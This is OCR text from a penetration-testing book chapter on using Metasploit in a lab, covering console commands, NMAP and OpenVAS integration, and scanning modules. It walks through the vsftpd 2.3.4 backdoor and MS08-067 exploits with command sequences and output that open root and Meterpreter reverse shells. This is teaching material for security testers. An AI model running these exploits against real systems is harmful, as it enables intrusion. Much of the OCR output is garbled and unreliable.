LPORT 4444 yes The listen port 


Description: 
Inject the meterpreter server DLL via the Reflective DLL Injection 
payload (staged). Connect back to the attacker 


mst > i 
Figure 3-12. The output of the info command in MSFconsole 
irb 
Metasploit is based on Ruby. It offers an Interactive Ruby (irb) shell 


wherein you can execute your own set of custom commands. This module 
enhances the post-exploitation capabilities of Metasploit. Simply type in 
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the irb command, as shown in Figure 3-13, to get into the irb shell. To 
learn more about Ruby programming, refer to https://www. ruby-lang. 
org/en/. 


root@kali: ~ oo 8 
File Edt View Search Terminal Help 
msf > irb 
*) Starting IRB shell 


>> print “Hello MEtasploit 
Hello MEtasploit=> nil 


= i 
Figure 3-13. The output of the irb command in MSFconsole 


show 


In the initial part of this chapter you saw various components of Metasploit 
including auxiliaries, exploits, payloads, and so on. Using the show 
command, as shown in Figure 3-14, you can list the contents of each 
category. For example, you can use the show auxiliary command to list 
all the auxiliary modules available within the framework. 


rata - eco 


Figure 3-14. The output of the show command in MSFconsole 
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spool 


You already saw the save command, which writes the configuration to 

a file. In a particular scenario, you may want to save the output of all 
modules and commands you execute. The spool command, as shown in 
Figure 3-15, logs all the console output to a specified file. 


root@kali: ~ 6090 
File Edit View Search Terminal Help 
msf > spool 
Usage: spool <off>|<filename> 


Example: 
spool /tmp/console.log 


msf > spool /root/Desktop/msf. log 
{*] Spooling to file /root/Desktop/msf.log... 
mf > f 


Figure 3-15. The output of the spool command in MSFconsole 


makerc 


Automation plays an important role in any framework. It is always helpful 
to automate a bunch of repetitive tasks to save time and effort. The makerc 
command, as shown in Figure 3-16, helps you automate Metasploit tasks 
by saving them as a script. 


root@kali: ~ 60°98 
File Edit View Search Terminal Help 


msf > makerc x 
Usage: makerc <output rc file> 


Save the commands executed since startup to the specified file. 


msf > makerc /root/Desktop/msfcommands. txt 


[*] Saving last 49 commands to /root/Desktop/msfcommands.txt ... 
msf >f 


Figure 3-16. The output of the makerc command in MSFconsole 
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db_ initiate 


Considering the complex nature of Metasploit, it is trivial that there must 
exist some database that could be used to store the task’s data. Metasploit 
is by default integrated with the PostgreSQL database. You first need to 
start the database service by executing the systemctl start postgresql 
command followed by the msfdb init command, as shown in Figure 3-17. 


root@kali: ~ 0o09 
File Edit View Search Terminal Help 
root@kali:~# systemctl start postgresql 
root@kali:~# msfdb init 
|. Database already started 
[+] Creating database user ‘msf' 
[+] Creating databases 'msf' 
[+] Creating databases 'msf test’ 
[+] Creating configuration file '/usr/share/metasploit-framework/config/database. yml' 
[+] Creating initial database schema 
root@kali:~# J 


Figure 3-17. The output of the systemctl and msfdb init commands 
in the terminal 


db_ status 


Once you have initialized the database, you can confirm that Metasploit is 
connected to it by executing the command db_status in MSFconsole, as 
shown in Figure 3-18. 


root@kali: ~ e608 
File Edit View Search Terminal Help 
msf > db status 
[*] postgresql connected to msf 
msf > 


Figure 3-18. The output of the db_status command in MSFconsole 
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workspace 


At times, it may happen that you are required to work on multiple 
penetration testing projects simultaneously. You certainly don’t want to 
mix up data from multiple projects. Metasploit offers efficient workspace 
management. For each new project, you can create a new workspace 

and thereby restrict the project data to that workspace. The workspace 
command, as shown in Figure 3-19, lists the available workspaces. You can 
create a new workspace using the command workspace -a <name>. 


root@kali: ~ 0 ® 8 

File Edit View Search Terminal Help 
msf > workspace -h z 
Usage: 

workspace List workspaces 

workspace -v List workspaces verbosely 

workspace [name] Switch workspace 

workspace -a [name] ... Add workspace(s) 

workspace -d [name] ... Delete workspace(s) 

workspace -D Delete all workspaces 

workspace -r <old> <new> Rename workspace 

workspace -h Show this help information 


msf > workspace 
* default 
msf > workspace -a sagar 
[*] Added workspace: sagar 
msf > workspace 
default 
* sagar 
msf > §j 


Figure 3-19. The output of the workspace command in 
MSFconsole 
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Invoking NMAP and OpenVAS Scans 
from Metasploit 


This section introduces how you can invoke and initiate NMAP and 
OpenVAS scans from within the Metasploit console. 


NMAP 


You learned about NMAP earlier in this book. You saw that NMAP can be 
triggered from the command-line interface or the ZENMAP graphical user 
interface. However, there is yet another way to initiate NMAP scans, and 
that’s through the Metasploit console. 

It can be helpful to import the NMAP scan results into Metasploit and 
then further exploit the open services. There are two ways this can be 
achieved. 


e Importing NMAP scans: You are aware that NMAP has 
an ability to generate and save scan output in XML 
format. You can simply import the NMAP XML output 
into Metasploit using the db_import command, as 
shown in Figure 3-20. 
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File Edit View Search Terminal Help 
[*] exec: clear 


msf > db import /root/Desktop/nmap. xml 

[*] Importing 'Nmap XML' data 

[*] Import: Parsing with 'Nokogiri v1.8.4' 

[*] Importing host 192.168.25.129 

[*] Successfully imported /root/Desktop/nmap. xml 
msf > hosts 


address mac name os name os flavor os sp purpose info comments 


192.168.25.129 00:0c:29:11:8e:bl Unknown device 


msf >f 


Figure 3-20. The output of the db_import and hosts commands in 
MSFconsole 


e Invoking NMAP from within MSFconsole: Metasploit 
offers the command db_nmap, which can be used to 
initiate NMAP scans directly from within the Metasploit 
console, as shown in Figure 3-21. 
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root@kali: ~ 0o09 
File Edit View Search Terminal Help 
msf > db_nmap 192.168.25.129 a 
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-24 11:23 IST 
[*] Nmap: Nmap scan report for 192.168.25.129 
[*] Nmap: Host is up (0.0042s Latency). 
] Nmap: Not shown: 977 closed ports 
] Nmap: PORT STATE SERVICE 
] Nmap: 21/tcp open ftp 
] Nmap: 22/tcp open ssh 
] Nmap: 23/tcp open telnet 
] Nmap: 25/tcp open smtp 
] Nmap: 53/tcp open domain 
] Nmap: 80/tcp open http 
] Nmap: 111/tcp open  rpcbind 
] Nmap: 139/tcp open netbios-ssn 
] Nmap: 445/tcp open microsoft-ds 
] Nmap: 512/tcp open exec 
] Nmap: 513/tcp open login 
] Nmap: 514/tcp open shell 
] Nmap: 1099/tcp open rmiregistry 
] Nmap: 1524/tcp open ingreslock 
] Nmap: 2049/tcp open nfs 
] Nmap: 2121/tcp open ccproxy-ftp 
] Nmap: 3306/tcp open mysql 
] Nmap: 5432/tcp open postgresql 
[*] Nmap: 5900/tcp open vnc 
[*] Nmap: 6000/tcp open X11 
[*] Nmap: 6667/tcp open irc 
[*] Nmap: 8009/tcp open ajpl3 
[*] Nmap: 8180/tcp open unknown 
[*] Nmap: MAC Address: 00:0C:29:11:8E:B1 (VMware) 
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds 


msf > hosts 

Hosts 

address mac name os name os flavor os sp purpose info comments 
192.168.25.129 060:0c:29:11:8e:bl Unknown device 

msf > fj 


Figure 3-21. Invoking NMAP from MSFconsole using the db_nmap 
command 


Once the NMAP scan is complete, you can use the hosts command to 
ensure that the scan is complete and the target is added into the Metasploit 
database. 
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OpenVAS 


You are already familiar with OpenVAS because you got a glimpse of most 
of its features in previous chapters. However, Metasploit offers capabilities 
to integrate OpenVAS to perform tasks from within the framework. Before 
you can actually perform any of the OpenVAS tasks from MSFconsole, 
you need to load the OpenVAS plug-in by executing the command load 
openvas, as shown in Figure 3-22. 


root@kali: ~ tO ) 
File Edit View Search Terminal Help 
sf > load openvas a 
*] Welcome to OpenVAS integration by kost and averagesecurityguy 
*] 
*] database is ready, connect to the OpenVAS server using openvas connect. 


] For additional commands use openvas help. 


m 
[ 
{ 
[*] OpenVAS integration requires a database connection. Once the 
[ 
[ 
{*) 


*] Successfully loaded plugin: OpenVAS 
msf > 
Figure 3-22. Loading the OpenVAS plug-in into MSFconsole 


Once OpenVAS is loaded in MSFconsole, there are numerous tasks 
you can perform. You can use the openvas_help command, as shown in 
Figure 3-23, to list all the possible tasks. 
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File Edit View Search Terminal Help 


msf > openvas help 
[*] openvas help 
[*] openvas debug 
[*] openvas_ version 
(*] 

[*] CONNECTION 


[*] ========== 


[*] openvas_ connect 
[*] openvas_ disconnect 


[*] TARGETS 


{*] openvas target create 
[*] openvas target delete 
openvas target list 


] 
] 
] TASKS 

] ===== 

] openvas_task_create 
] openvas task delete 
] openvas task list 

] openvas task start 
] openvas task stop 
[*] openvas task pause 
[*] openvas task resume 


[*] openvas task resume or start 


[*] CONFIGS 


[*] openvas config list 


[*] FORMATS 
[*] ======= 
[*] openvas format list 


[*] REPORTS 


[*] openvas report list 

[*] openvas_report_delete 
[*] openvas_report_import 
[*] openvas_report_download 
msf > 


root@kali: ~ 


Display this help 
Enable/Disable debugging 
Display the version of the OpenVAS server 


Connects to OpenvVAS 
Disconnects from OpenVAS 


Create target 
Deletes target specified by ID 
Lists targets 


Create task 

Delete a task and all associated reports 
Lists tasks 

Starts task specified by ID 

Stops task specified by ID 

Pauses task specified by ID 

Resumes task specified by ID 

Resumes or starts task specified by ID 


Lists scan configurations 


Lists available report formats 


Lists available reports 

Delete a report specified by ID 

Imports an OpenVAS report specified by ID 
Downloads an OpenVAS report specified by ID 


Figure 3-23. The output of the openvas_help command in 


MSFconsole 


The OpenVAS server may be running locally or on some remote 


system. You need to connect to the OpenVAS server using the command 


openvas_connect, as shown in Figure 3-24. You need to supply a 


username, password, OpenVAS server IP, and port as parameters to this 


command. 
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root@kali: ~ 0o09 
File Edit View Search Terminal Help 
msf > openvas connect admin 439ceaf3-928a-4bc0-aal2-59938cfb8444 127.0.0.1 9390 ok E 
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin... 
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/openvas-omp-0.0.4/lib/openvas -o 
mp.rb:201: warning: Object#timeout is deprecated, use Timeout.timeout instead. 
[+] OpenVAS connection successful 


msf >i 


Figure 3-24. Connecting to the OpenVAS server using the openvas_ 
connect command in MSFconsole 


Once the connection to the OpenVAS server is successful, you need 
to create a new target using the command openvas_target_create, as 
shown in Figure 3-25. You need to supply the test name, target IP address, 
and comments (if any) as parameters to this command. 


root@kall: ~ oo 9 
File Edit View Search Terminal Help 


msf > openvas target create 

*] Usage: openvas target create <name> <hosts> <comment> 

msf > openvas target create test 192.168.25.129 test-scan 

/usr/share/metasploit - framework/vendor/bundle/ruby/2.5.0/gems/openvas -omp-0.0.4/11b/openvas-omp.rb:201: warning: Objectetimeout is d 
eprecated, use Timeout.timeout instead 

*) 87bbf542-331d-45e6-b216-f8b32b914170 
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/openvas-omp-0.0.4/Lib/openvas-onp.rb:201: warning: Object#timeout is di 
eprecated, use Timeout.timeout instead. 

[+] OpenvaS List of targets 


10 Name Hosts Max Hosts In Use Comment 


4e8¢69af -¢384-4d6d-9932-750d86021597 Target for immediate scan of IP 192.168.25.129 192.168.25.129 1 1 
87bbD1542-33fd-45e6-b2f6-fSb32b9f4170 test 192.168.25.129 1 e test-scan 
8b985290-49c1-4475-aee4-67fbdf217da3 Target for immediate scan of IP 192.168.25.132 192.168.25.132 1 1 
be89d561-0f1b-4713-9339-fe7e123c5e0c Target for immediate scan of IP 192.168.25.128 192.168.25.128 1 1 


ost >f 


Figure 3-25. Creating a new target for an OpenVAS scan using the 
openvas_target_create command in MSFconsole 


After creating a new target, you need to select scan profiles using the 
command openvas_config_ list, as shown in Figure 3-26. 
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root@kall: ~ ooo 
File Edit View Search Terminal Help 
msf > openvas config list e 
/usr/share/aetasploit-framework/vendor/bundle/ruby/2.5.0/geas/openvas-oap-0.0.4/Lib/openvas-onp.rd:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
+] OpenvAS List of configs 


10 Name 


085569ce-7T3ed-lldf-83c3-602264764cea empty 
2d3f@51c-55ba-1le3-bf43-406186ea4fcS Host Discovery 

698 f69le-7489-1ldf-9d8c-O02264764cea Full and fast ultimate 
708125C4-7489-110f -8094-002264764cea Full and very deep 
74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate 
8715¢877 -47a0-438d-98a3-27c7a6ab2196 Discovery 
bbca7412-a950-11¢3-9109-406186ea4fcS System Discovery 
daba56c8-73ec-1ldf-a475-902264764cea Full and fast 


mst > i 


Figure 3-26. The output of the openvas_config_list command in 
MSFconsole 


Once you have selected the scan profile, it’s time to create a scan task. 
The command openvas_task_create can be used to create a new task, as 
shown in Figure 3-27. You need to supply the scan name, comments if any, 
the configuration ID, and the target ID as parameters to this command. 


root@ lal: ~ CE] 
File Edit View Search Terminal Help 
msf > openvas task create s 
*] Usage: openvas task create <name> <comment> <config id> <target id> 
msf > openvas task create test test-scan dabaS6c8-73ec-lldf-a475-002264764cea 87bbf542-33fd-45e6 -b2f6-f8b32b9f4170 
/usr/share/aetasploit -framework/vendor/bundle/ruby/2.5.6/geas/openvas -omp-0.6.4/1ib/openvas-omp.rb:261: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
*] ca@b6a89-be39-4cf2-87fd-289776af2beS 
/usr/share/metasploit -framework/vendor/bundle/ruby/2.5.0/gems/openvas -omp-0.0.4/1ib/openvas-omp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead 
+] OpenvaAS List of tasks 


I0 Name Comment Status Progress 
577 ce4cd-2398-470c-bbd@-26b209585404 Immediate scan of IP 192.168.25.132 Done 1 
86519366 -23¢¢-42f4-S9ef2-9nceGal697a2 Immediate scan of IP 192.168.225.128 Done -l 
a25ad62d-3e33-4b1d-9869-d291265b5fc3 Immediate scan of IP 192.168.25.129 Done 1 
ca0b6a89 -be39-4cf2-87fd-289776af2beS test test-scan New 1 
msf>f§ 


Figure 3-27. Creating anew OpenVAS scan task using the command 
openvas_task_create in MSFconsole 


Now that the scan task has been created, you can initiate the scan 
using the command openvas_task_start, as shown in Figure 3-28. You 
need to supply the task ID as a parameter to this command. 
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root@kali: ~ o0 
File Edit View Search Terminal Help 
msf > openvas task start cCa0b6a8g9-be39-4cf2-87fd-2897763f2be5 aj 
/usr/share/aetasploit-framework/vendor/bundle/ruby/2.5.0/geas/openvas-onp-0.0.4/lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout. timeout instead. 
[*] <X><authenticate response status='200' status text='0K'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity></aut 
henticate_response><start_task_response status='202" status text="OK, request submitted'><report_id>204e59af-7fb5-4b9e-9906-e64belf2 
a665</report id></start task response></X> 
msf > openvas task list 
/usr/share/aetasploit- framework/vendor/bundle/ruby/2.5.6/gems/openvas -omp-6.0.4/Lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
le) OpenvAS List of tasks 


10 Name Comment Status Progress 
577cedcd-2398-47dc-bbdO-20b209585404 Immediate scan of IP 192.168.25.132 Done -1 
865193b6-23ee-42f4-9ef2-9aee031697a2 Immediate scan of IP 192.168.25.128 Done -1 
a25ad62d-3e33-4b1d-9869-d291265b5fc3 Immediate scan of IP 192.168.25.129 Done -1 
ca0b6a89-be39-4cf2-87fd-289776af2be5 test test-scan Running 1 

ast > f 


Figure 3-28. Running the newly created OpenVAS task using the 
openvas_task_start command in MSFconsole 


It will take a while before the scan completes. Once the scan is 
complete, you can view the reports using the command openvas_report_ 
list, as shown in Figure 3-29. 


root@kall: ~ 9o00 
File Edit View Search Terminal Help 
eprecated, use Timeout.timeout instead. = 
/usr/share/aetasploit-framework/vendor/bundle/ruby/2.5.8/gems/openvas -omp-6.6.4/Lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5,0/geas/openvas-onp-6.6.4/lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
/usr/share/netasploit -framework/vendor/bundle/ruby/2.5.0/gems/openvas-onp-0.6.4/lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/geas/openvas -omp-0.6.4/Lib/openvas-onp.rb:201: warning: Object#timeout is d 
eprecated, use Timeout.timeout instead. 
1+] OpenVAS list of reports 


ID Task Name Start Tine Stop Tine 


204¢59af -71b5-4bSe-9966-e64belf2a665 test 2018-09-24T06:34:53Z 2018-09-24707:09:07Z 
3973274e-48a8-4bed-a485-132d97cbedcf Immediate scan of IP 192.168.25.128 2018-09-06704;33:092 2018-09-06784:45:37Z 
7573405 -cb40-4cca-9ac3-ed356d5b6500 Immediate scan of IP 192.168.25.132 2018-09-06T04:47:302 2018-69-06T05:00:342 
fb9bfS19-6f4f-4e07-9125-7bb2041d9877 Immediate scan of IP 192.168.25.129 2018-08-02706:22:55Z 2018-68-02706:47:012 


Figure 3-29. Listing the OpenVAS reports using the openvas_report_ 
list command in MSFconsole 


mst > openvas_report_list J 


Now that the scan is complete and the report is ready, you can 
download the report using the openvas_report_download command, as 
shown in Figure 3-30. You need to supply the report ID, report format, 
output path, and report name as parameters to this command. 
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e64be112a665 pdf /root/Desktop/ test.pdf 


Figure 3-30. Saving the OpenVAS report using the oepnvas_report_ 
download command in MSFconsole 


Scanning and Exploiting Services with 
Metasploit Auxiliaries 


Metasploit offers a wide choice of exploits and auxiliary modules for 
scanning, enumerating, and exploiting various services and protocols. 
This section covers some of the auxiliary modules and exploits targeting 
commonly used protocols. 


DNS 


In the previous chapter, you learned how NMAP can be used for 
enumerating a DNS service. Metasploit also has several auxiliary modules 
that can be used for DNS reconnaissance. 

Figure 3-31 shows the use of the /auxiliary/gather/enum_dns 
module. All you need to do is configure the target domain and run the 
module. It returns the associated DNS servers as a result. 
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root@p kal: = 


File Edt View Search Terminal Help 
mst > use ouxiliory/gather/enun_dns 
mat auxiliary(gather/enus_das) > show options 


Module options (auxiliory/gather/enum_ dns) 


+1 megacorpone. com megacorpone. com. 
+) megacorpone.com NS: n32.megacorpone.com 


Nare Current Setting Required Descriptior 
DOMAIN yes The target domin 
ENUM _A true yes Enumerate DNS A record 
ENUM_AXPR true yes Initiate a zone transfer against each NS record 
ENUM BRT fal yes Brute force subdowains and hostnames via the supplied wordlist 
ENUM CNAME true yes d 
ENUM MX true yes 
ENUN NS true yes 
ENUM AVL fals yes f IP addresses 
ENUM SOA true yes d 
ENUM SRV true yes Enumerate the most common SRY records 
ENUN TLO false yes Perform a TLO expansion by replacing the TLO with the IANA TLD list 
ENUM TXT true yes Enumerate ONS TXT record 
IPRANGE no The target address range or CIDR identifier 
NS no Specify the nameserver to use for queries (default is system ONS) 
STOP WLOCRD false yes Stops bruteforce enumeration if wildcard resolution is detected 
THREADS 1 no Threads for ENUM SRT 
WORDLIST /usr/share/metasploit-framework/data/wordlists/namelist.txt no wordlist of subdomains 
mst auxiliary(gather/enum das) > set DOMAIN megacorpone.con 
DOMAIN => megacorpone. com 
mat auxiliary(gather/enum_das) > run 
W, [2018-09-24728:01:19,563098 #14445] WARN -- : Naweserver 192.168.25.2 not responding within UDP timeout, trying next one 
F, [2018-09-24718:01:19.563455 #14445] FATAL -- : No response from nameservers list: aborting 
I") querying ONS NS records for megacorpone.com 
I+) megacorpone.com NS: s3.megacorpone. com. 
1 
1 


Figure 3-31. The use of the auxiliary module enum_dns 


FTP 


Let’s assume that when conducting an NMAP scan you found that your target 
is running an FTP server on port 21 and the server version is vsftpd 2.3.4. 

You can use the search function to find out whether Metasploit has 
any exploits for the vsftpd server, as shown in Figure 3-32. 


root uai /usr/share/metasphott framework/modules eoo 
Fie Edt Vew Seach Temni Help 


mat > search vsftpd 
T Module database cache not built yet, using slow search 


Matching Modules 


Mare Disclosure Date Rank Description 


exploit/unix/ftp/vsftpd 234 backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution 


ans l 
Figure 3-32. The output of the search for the vsftpd exploit 


Here you'll use the exploit /unix/ftp/vsftpd_234_backdoor to exploit 
the vulnerable FTP server. You can configure the target IP address as the 
RHOST variable and then run the exploit, as shown in Figure 3-33. 
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root@kall; /usr/share/metasploit-framework/modules 
Fae Edt View Search Terminal Help 


+ -- --m[ 538 payloads - 41 encoders - 10 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp 


nsf > use exploit/unix/ftp/vsftpd_234_backdoor 
mst exploit(unix/ftp/vsřtpd_234_backdoor) > show options 


Module options (exploit/unix/ftp/vsftpd_234 backdoor) : 


Nome Current Setting Required Description 
RHOST yes The target address 
RPORT 21 yes The target port (TCP) 


Exploit target: 
Id Name 


8 Automatic 


nsi exploit(unix/ftp/vsftpd_234 backdoor) > set RHOST 192.168.25.129 
RHOST => 192,168.25,129 
msf exploit(unix/ftp/vsftpd_234 backdoor) > exploit 


192.168.25.129:21 - Banner: 220 (vsFTPd 2.3.4) 
[*] 192.168.25.129:21 - USER: 331 Please specify the password. 
[+] 192.168.25.129:21 - Backdoor service has been spawned, handling 
[+] 192.168.25.129:21 UID: uid=6(root) gid=0(root) 
*) Found shell. 
*] Command shell session 1 opened (192.168.25.128:38095 -> 192.168.25.129:6206) at 2018-69-26 15:26:35 +0530 


uname -a 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
whoami 


initrd 
initrd. img 
lib 
lost+found 
media 

mnt 

nohup. out 
opt 

proc 

root 

sbin 

srv 


Figure 3-33. Successful exploitation of target using the vsftpd_234_ 
backdoor exploit 


The exploit is successful, and you get command shell access to the 
target system. 


HTTP 


The Hypertext Transfer Protocol (HTTP) is one of the most commonly 
found services on hosts. Metasploit has numerous exploits and auxiliaries 
to enumerate and exploit an HTTP service. The auxiliary module 
auxiliary/scanner/http/http_ version, as shown in Figure 3-34, 
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enumerates the HTTP server version. Based on the exact server version, 
you can plan further exploitations more precisely. 


root@kali: ~ e098 
File Edit View Search Terminal Help 


msf > use auxiliary/scanner/http/http version zi 
msf auxiliary(scanner/http/http_version) > show options 


Module options (auxiliary/scanner/http/http_version): 


Name Current Setting Required Description 

Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
RHOSTS yes The target address range or CIOR identifier 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

THREADS 1 yes The number of concurrent threads 

VHOST no HTTP server virtual host 


msf auxiliary(scanner/http/http_version) > set RHOSTS 192.168.25.129 
RHOSTS => 192.168.25.129 
msf auxiliary(scanner/http/http_version) > run 


[+] 192.168.25.129:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/S.2.4-2ubuntu5.10 ) 
[*] Scanned 1 of 1 hosts (100% complete) 

[*] Auxiliary module execution completed 

msf auxiliary(scanner/http/http_version) > [] 


Figure 3-34. The output of the auxiliary module http_version 


Many times a web server has directories that are not directly exposed 
and may contain interesting information. Metasploit has an auxiliary 
module called auxiliary/scanner/http/brute_dirs that scans for such 
directories, as shown in Figure 3-35. 


File Edt View Search Terminal Help 
maf > use auxiliary/scanner/http/brute dirs a 
maf auxiliary(scanner/http/brute_dirs) > show options 


Module options (auxitiary/scanner/nttp/drute_dirs) 


Nare Current Setting Required Description 

FORMAT 2,93, 080 yes The expected directory format (a alpha, d digit, A upperalpha) 
PATH 1 yes The path to identify directories 

Proxies no A proxy chain of format type:host:port[,type:host:port][...} 
RHOSTS yes The target address range or CIOR identifier 

RPORT 80 yes The target port (TCP) 

SSL false no Negotiate SSL/TLS for outgoing connections 

THREADS 1 yes The nuwber of concurrent threads 

VHOST no HTTP server virtual host 


nst auxiliary(scanner/http/brute dirs) > set AMOSTS 192.168.25.129 
RMOSTS => 192.168.25.129 
nsf auxiliary(scannershttp/brute_dirs) > run 


[*) Using code ‘404" as not found 

f+) Found http: //192.168.25.129:88/dav/ 260 
te) Found http: //192.108.25.129:86/doc/ 200 
[*] Scanned 1 of 1 hosts (160% complete) 

[+] Auxiliary module execution completed 
mst auxiliary(scanner/http/brete_dirs) > f 


Figure 3-35. The output of the auxiliary module brute_dirs 
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RDP 


The Remote Desktop Protocol (RDP) is a proprietary protocol developed 
by Microsoft for remote graphical administration. If your target is a 
Windows-based system, then you can execute an auxiliary module called 
auxiliary/scanner/rdp/ms12_020_check, as shown in Figure 3-36. It 
checks whether the target is vulnerable to the MS-12-020 vulnerability. 
You can find out more details about this vulnerability at https://docs. 
microsoft.com/en-us/security-updates/securitybulletins/2012/ 
ms12-020. 


root@kall: ~ ooo 

File Edit View Search Terminal Help 
msf > use auxilíary/scanner/rdp/ns12_020_check 
msf auxiliary(scanner/rdp/msi2 020 check) > show options 
Module options (auxiliary/scanner/rdp/esi2 626 check) 

Nane Current Setting Required Description 

RHOSTS yes The target address range or CIOR identifier 

RPORT 3389 yes Remote port running ROP (TCP) 


THREADS 1 yes The number of concurrent threads 


msf auxiliary(scanner/rdp/msi2 020 check) > set RHOSTS 192.168.25.130 
RHOSTS => 192.168.25.130 
maf auxiliary(scanner/rdp/msi2 020 check) > run 


+] 192.168.25.130:3389 192.168.25.130:3389 The target is vulnerable. 
*] Scanned 1 of 1 hosts (106% complete) 

] Auxiliary module execution completed 
mst auxiliary(scanner/rdp/ms12_020_check) > J 


Figure 3-36. The output of the auxiliary module ms12_020_check 


SMB 


In the previous chapter, you used NMAP to enumerate SMB. Metasploit 
has lots of useful auxiliary modules for the enumeration and exploitation 
of SMB. 

A simple search for SMB modules fetches results, as shown in 
Figure 3-37. 
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Figure 3-37. The output of the search query for SMB-related modules 
and exploits 


You can use one of the auxiliary modules called auxiliary/scanner/ 
smb/smb_enumshares, as shown in Figure 3-38. You need to set the value of 
the RHOST variable to that of the target IP address. The module returns the 
results with a list of shares on the target system. 


root @ kal: ~ 0o09 

File Edt View Search Terminal Help 
mst > use auxiliary/scanner/smb/smb_enunshares e 
msf auxiliary(scanner/smb/smb_enumshares) > show options 
Module options (auxiliary/scanner/smb/smb enumshares) : 

Nane Current Setting Required Description 

LogSpider 3 no 6 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 6, 1, 2, 3) 

MaxDepth 999 yes Max number of subdirectories to spider 

RHOSTS yes The target address range or CIOR identifier 

sMBDomain . no The Windows domain to use for authentication 

SMBPass no The password for the specified username 

SMBUser no The username to authenticate as 

ShowFiles false yes Show detailed information when spidering 

SpiderProfiles true no Spider only user profiles when share = C$ 

SpiderShares false no Spider shares recursively 

THREADS 1 yes The number of concurrent threads 


msf auxiliary(scanner/seb/smb_enumshares) > set RHOSTS 192.168.25.130 
RHOSTS => 192. 168.25.130 
msf auxiliary(scanner/smb/smb_enumshares) > run 


{-] 192.168.25.130:139  - Login Failed: The SMB server did not reply to our request 
(*] 192.168.25,130:445 - Windows XP Service Pack 3 (English) 

[+] 192,268.25.130:445 - IPC$ - (I) Remote IPC 

i+] 192.168.25.130:445  - SharedDocs - (DS) 

(+) 192.168.25.130:445 - $ - (0S) 

i+] 192.168.25.130:445 - ADMINS - (DS) Remote Admin 

I+] 192.168.25.130:445 - C$ - (DS) Default share 

(*] Scanned 1 of 1 hosts (168% complete) 

[+] Auxiliary module execution completed 

mst auxiliary(scanner/smb/smb_enumshares) > I 


Figure 3-38. The output of the auxiliary module smb_enumshares 
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Another popular SMB exploit is for the vulnerability MS-08-67 netapi. 
You can use the exploit exploit/windows/smb/ms08_067_netapi, as 
shown in Figure 3-39. You need to set the value of the variable RHOST to 
the IP address of the target system. If the exploit runs successfully, you are 
presented with the Meterpreter shell. 


root@kali: ~ o0 
File Edit View Search Terminal Help 


msf > use exploit/windows/smb/ms08 067 netapi A 
msf exploit (windows/smb/ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08 667 netapi): 


Name Current Setting Required Description 

RHOST yes The target address 

RPORT 445 yes The SMB service port (TCP) 

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) 


Exploit target: 
Id Name 


8 Automatic Targeting 


msf exploit (windows/smb/ms08_067_netapi) > set RHOST 192.168.25.136 
RHOST => 192.168.25.130 
msf exploit (windows/smb/ms08 067 netapi) > exploit 


*] Started reverse TCP handler on 192.168.25.128:4444 

} 192.168.25.130:445 Automatically detecting the target... 

} 192.168.25.130:445 - Fingerprint: Windows XP - Service Pack 3 - Lang:Unknown 

*) 192.168.25.130:445 - We could not detect the language pack, defaulting to English 

} 192.168.25.130:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) 

] 192.168.25.130:445 - Attempting to trigger the vulnerability... 

*] Sending stage (179779 bytes) to 192.168.25.130 

*) Meterpreter session 1 opened (192,.168.25.128:4444 -> 192.168.25.130:1085) at 2018-69-26 20:49:18 +0530 


meterpreter > sysinfo 
Computer : SAGAR-C51B4AADE 


os : Windows XP (Build 2600, Service Pack 3). 
Architecture : x86 

System Language : en US 

Domain : MSHOME 

Logged On Users : 1 


Meterpreter : x86/windows 
q r>f 


Figure 3-39. Successful exploitation of the target system using the 
exploit ms08_067_netapi 


SSH 


Secure Shell (SSH) is one of the commonly used protocols for secure 
remote administration. Metasploit has many auxiliary modules for SSH 
enumeration. You can use the auxiliary module auxiliary/scanner/ssh/ 
ssh_version, as shown in Figure 3-40. You need to set the value of the 
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RHOST variable to that of the target. The module executes and returns the 
exact SSH version that is running on the target. This information can be 
used in further exploitations. 


root@kali: ~ eo 90 

File Edt View Search Terminal Help 
msf > use auxiliary/scanner/ssh/ssh_version 
psf auxiliary(scanner/ssh/ssh version) > show options 
Module options (auxiliary/scanner/ssh/ssh version) 

Nane Current Setting Required Description 

RHOSTS yes The target address range or CIDR identifier 

RPORT 22 yes The target port (TCP) 

THREADS 1 yes The number of concurrent threads 

TIMEOUT 30 yes Timeout for the SSH probe 


msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.25.129 
RHOSTS => 192.168.25.129 
msf auxiliary(scanner/ssh/ssh_version) > run 


+] 192.168.25.129:22 SSH server version: SSH-2.0-OpenSSH_4.7p1 Oebian-S8ubuntul ( service.version=4.7p1 openssh. comment=Debian| 
-Bubuntul service.vendor=OpenBSD service. familys SH service. product#OpenSSH os.vendor=Ubuntu os.devicesGeneral os.family=Linux ol 
